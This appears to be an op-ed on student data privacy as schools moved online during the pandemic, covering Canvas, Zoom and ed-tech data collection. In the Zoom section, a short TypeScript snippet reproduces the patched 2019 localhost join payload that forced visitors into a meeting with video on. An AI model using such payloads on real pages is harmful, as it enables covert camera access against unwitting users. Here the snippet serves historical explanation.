Most of America’s public schools have closed during the global coronavirus pandemic, and U.S. districts are engaged in an unprecedented shift to online education, at least until the crisis is over.

Along with the obvious concerns about this vast, rapid shift to digital education, such as whether students have technology and Internet access and what materials can quickly be put online, there is another that gets less attention: student data privacy.

In 2018, the FBI issued a warning to the public about cyberthreat concerns related to K-12 students. It said that the growth of education technologies in schools, along with the widespread collection of student data, could have serious privacy and safety implications if that data is compromised or exploited by criminals.

The FBI said the types of data that can be collected on students include personally identifiable information; biometric data; academic progress; behavioral, disciplinary and medical information; Web browsing history; students’ geolocation; IP addresses used by students; and classroom activities.
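
To make the scope of that list concrete, here is a hypothetical sketch, written in TypeScript, of what a consolidated student record covering those categories might look like. The field names are our own illustration, not any vendor’s actual schema.

```typescript
// Hypothetical illustration only: a consolidated student record covering
// the data categories named in the FBI alert. This is not any vendor's
// actual schema; every field name here is invented for clarity.
interface StudentRecord {
  // Personally identifiable information
  fullName: string;
  dateOfBirth: string;            // ISO 8601, e.g. "2008-04-17"
  studentId: string;

  // Biometric and medical data
  biometricTemplates: string[];   // e.g. fingerprint or face encodings
  medicalNotes: string[];

  // Academic, behavioral, and disciplinary history
  grades: Record<string, string>; // course -> grade
  disciplinaryIncidents: { date: string; description: string }[];

  // Device and activity data
  browsingHistory: { url: string; visitedAt: string }[];
  ipAddresses: string[];
  geolocation: { lat: number; lon: number; recordedAt: string }[];
  classroomActivity: { app: string; event: string; at: string }[];
}
```

A single record of this shape, compiled over years, is precisely the kind of asset that becomes dangerous if breached or sold.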

This post looks at some of the current issues around student data privacy as millions of students are now trying to learn online at home. This was written by Roxana Marachi, an associate professor of education at San Jose State University, and Lawrence Quill, a professor of political science at San Jose State University. The views and opinions expressed here are those of Marachi and Quill and do not necessarily reflect the official policy or position of their employer.

(This is an update to an earlier version, adding new information.)

By Roxana Marachi and Lawrence Quill

Hundreds of universities and colleges are transitioning from face-to-face courses to “online” and “distributed” modes of instruction as a result of the coronavirus pandemic, which has shut down American schools coast to coast.

The architecture is already in place to respond to the new learning environment created by the pandemic. Platforms such as the Canvas Learning Management System (LMS), which operates across the country in thousands of colleges, universities and K-12 schools, already have access to data from millions of faculty and students and will gain access to many more.

Zoom Video Communications, a California-based remote-conferencing company, is also likely to see experienced users turning to its videoconferencing system, along with many new users employing the software for the first time.

Adoption of these technologies comes at a pivotal moment for educational institutions. As schools move to these online spaces, it’s important that we not lose sight of ongoing controversies associated with these platforms.

Instructional technologists and educators penned a letter of protest in December 2019 to leadership at Instructure, the Utah-based educational-technology company behind Canvas, over concerns that the pending sale of the company to Thoma Bravo, a private equity firm, for an estimated $2 billion would compromise student data.

The letter cites a speech at an investor conference in March 2019 by Instructure’s then-chief executive, Dan Goldsmith, who “lauded the sheer amount of student data the company possesses: ‘We have the most comprehensive database on the educational experience in the globe. So given that information that we have, no one else has those data assets at their fingertips to be able to develop those algorithms and predictive models.’”

The authors of the letter requested legally binding statements from the company specifying what would be done with the data, what protections would be enacted, who would have access under new ownership, and how students would be able to opt out of data collection and retention.

In response, Instructure invited the lead author, Cristina Colquhoun, onto its Privacy Council and indicated it would create a Privacy Advisory Board to discuss questions related to the use of data. Despite public assurances that data will not be sold, the issues raised in the letter remain unresolved, and the legally binding agreements that were requested have not materialized. We reached out to Colquhoun, who conveyed that “they are working with us to come up with resolutions and it’s a long process, but resolutions have not yet been enacted. Hence the petition is still open until legally binding statements are incorporated and solutions enacted.”

Goldsmith no longer leads Instructure, and plans for the company are still in flux, but the kinds of algorithmic and predictive models referred to in his March 2019 speech are commonly cited in data-driven plans across the larger education-technology sector. Funding streams for many ed-tech companies rely on the ability to monetize student behavioral data and to extend the surveillance of students’ learning experiences before, during and after college, and into employee placement and corporate training programs.

Many recent educational initiatives, including piecemeal digital badges, “interoperable learning records” and skills registries, involve attempts to create digital trails that will follow a student over their entire educational path, ostensibly making it easier for employers to find hires with the specific skills they need. At some point in the not-too-distant future, we can expect that long-term profiles of students from pre-K and grade school through college, including grade-point averages, aptitude assessments and behavioral data from interactions with online platforms, will be available for college admission committees and employers to scrutinize.

Instructure has said publicly in response to the request for a binding statement that it will not sell data: “Instructure has not and will not sell user data. Our perspective and commitment haven’t changed. We will always comply with privacy laws. We will be transparent and communicative about our privacy practices.” Holden Spaht, managing director of Thoma Bravo (Instructure’s potential acquirer), publicly stated: “We commit to being transparent in our data usage, protecting user privacy, and leading by example. We do not — and we will not — sell student data. And we will never share user data with other companies in the Thoma Bravo portfolio.”

While both companies have made these public commitments to transparency and communication, their leaders have yet to communicate directly with the platform’s more than 30 million users about the pending sale to a private equity firm, the privacy implications of that sale, or users’ options for managing their data.

Further, even if Instructure were to fulfill its legally nonbinding promise to keep data safe from “sale,” its terms have allowed, and still allow, data sharing with third-party affiliates, and it stores its data on Amazon Web Services, one of the largest big-data companies, which also hosts student and instructor data from hundreds of other ed-tech firms.

Instructure says its employees design every feature that uses data “with the student, educator, or administrator in mind.”

Yet programs that may sound student-centric often do not fully account for issues of access, opportunity or equity. Structural, hidden costs and stark inequities are baked into the outcomes that would result from the long-term datafication of students’ lives.

On many ed-tech platforms, a child’s early struggles, once stored in such digital trails, may never be deleted, or may be unfairly and inappropriately fed into flawed algorithmic predictions that limit later opportunities. Privacy International has explained the discriminatory consequences of data exploitation, in which data collected about an individual at one point in time can foreclose opportunities later on.

Researchers from the Data Justice Lab at Cardiff University have documented a host of data harms resulting from big data analytics that include, among others, targeting based on vulnerability, misuse of personal information, discrimination, data breaches, social harm and political manipulation.

As for Zoom, the videoconferencing application has quickly established itself as the default education solution for synchronous meetings, and in March it was the most downloaded app in Apple’s App Store.

It has achieved this reach in part through subsidization, offering the service free to gain market share. Not surprisingly, such instant access has also given the company a vast capacity for data extraction.

In 2019, the Electronic Privacy Information Center (EPIC), a Washington, D.C.-based independent nonprofit research center, filed a complaint with the Federal Trade Commission concerning security problems with Zoom’s videoconferencing service. The complaint said Zoom had engaged in “unfair and deceptive business practices” in the design of the platform that permitted Zoom to “bypass browser security settings and remotely enable a user’s web camera without the knowledge or consent of the user.”

In a recent response to a query about this issue, Zoom stated: “EPIC’s 2019 complaint was regarding a bug in the Zoom platform that could potentially enable a bad actor to force a Mac user to join a Zoom room with video enabled. EPIC raised this issue in July of 2019 and Zoom promptly addressed it, fully resolving the matter.”

The promptness of the response could be debated, however, as the FTC complaint indicated that when Zoom was informed of the vulnerabilities, “it did not act until the risks were made public, several months after the matter was brought to the company’s attention.”
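
For readers curious about the mechanics, below is a minimal sketch of the class of flaw described in the 2019 public disclosure, which has since been patched. It assumes a browser context, and the port and URL pattern follow our reading of that disclosure; treat it as historical illustration, not current Zoom behavior.

```typescript
// Illustrative sketch only, based on the public 2019 disclosure of the
// (since-patched) Mac flaw. Zoom's client installed a local web server
// that accepted meeting-join requests; any page a victim visited could
// trigger one, because simple GET requests to localhost (such as an
// image load) bypass normal browser cross-origin protections.
const ATTACKER_MEETING_ID = "000000000"; // placeholder meeting number

// Embedding this request in a page could silently pull a visitor into
// the attacker's meeting, camera on, with no prompt. Port 19421 is the
// one reported in the disclosure; it is an assumption here, not
// verified current behavior.
new Image().src =
  `http://localhost:19421/launch?action=join&confno=${ATTACKER_MEETING_ID}`;
```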

Currently, a number of controversies with the platform remain in the public sphere, including “attention tracking” of attendees, privacy issues relating to potential data sales, and default settings that allow screen sharing to be interrupted and taken over by individuals on a call other than the conference coordinator. The New York Times and Forbes have reported on this last issue, known as “Zoombombing,” and posts under the corresponding hashtag have, fittingly, been on the rise.

As author and scholar Shoshana Zuboff notes in her work on surveillance capitalism, the suppression of privacy is at the heart of this business model, which has a built-in tendency to test the limits of what is socially and legally acceptable in terms of data collection.

E-learning platforms pursue an imperative to collect more and more data. Every action a user performs may be recorded and scanned for information, which can then be used to reconfigure algorithms and optimize processes.
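
As a rough illustration of how that recording works in practice, here is a minimal TypeScript sketch of the kind of clickstream telemetry an e-learning platform might run. The event names and the endpoint are our invention, not any specific vendor’s code.

```typescript
// Minimal sketch of clickstream telemetry: the mechanism by which a
// platform can record "every action a user performs." The endpoint and
// event shape are hypothetical, not any vendor's actual API.
interface LearningEvent {
  userId: string;
  event: string;                   // e.g. "page_view", "quiz_answer"
  detail: Record<string, unknown>; // arbitrary context for the event
  timestamp: string;               // ISO 8601
}

function track(userId: string, event: string, detail: Record<string, unknown>): void {
  const payload: LearningEvent = {
    userId,
    event,
    detail,
    timestamp: new Date().toISOString(),
  };
  // Fire-and-forget: each interaction is shipped to an analytics store,
  // where it can later feed predictive models and "engagement" scores.
  fetch("https://analytics.example-lms.com/events", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  });
}

// Every click, scroll, and pause can be instrumented this way:
track("student-42", "video_pause", { courseId: "BIO-101", secondsIn: 312 });
```

A few lines like these, attached to every interface element, are all it takes to turn a course into a continuous behavioral data stream.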

It is precisely this model that is being used by Facebook’s Oculus VR system, which is also making inroads into education. The VR software can collect a wide range of data on its users’ emotional and physiological experiences within virtual spaces, data that can then be sold on to advertisers or traded in human-capital performance markets.

What we’re seeing can be described as the “apology model of data extraction.” First, companies collect as much data as possible. Then, if there is an outcry, they respond with an apology and offer to consult with users by walking back the most egregious policies.

Online technologies undoubtedly have the capacity to perform useful services. But an easy-to-use interface shouldn’t give companies free rein to take as much data as they wish, especially when users are not allowed options to opt out. Within education, we need stronger systemic guardrails in place to protect against exploitative practices of tech companies vying for lucrative contracts.

We also need to recognize that emerging technologies, including blockchain identity systems and ledger-based badging programs, are part of much broader trends designed both to co-opt and to upend public institutions that have been struggling to maintain standards amid decreased funding and increasing demands.

With data as the new oil, there is every reason to suspect that the world of education will not return to “business as usual” after the current coronavirus pandemic passes, precisely because education has been identified as an “industry” ripe for disruption.

We are experiencing a watershed moment. At no other time in history have we seen such a massive move from in-person learning experiences to online instruction.

The idea that nothing can be done about the kinds of technological disruption we are now witnessing in education must be resisted. It betrays a misunderstanding of how technologies develop in the first place, ignores power dynamics in the shaping of education policies, and too readily sacrifices the social commitments that have held our society together, values that are now being tested by the coronavirus pandemic.

Inevitability arguments reject the past by spuriously claiming to possess the knowledge necessary to reform society. We would do well to remember this as we shift to technologies that challenge some of the core values of our liberal democracy.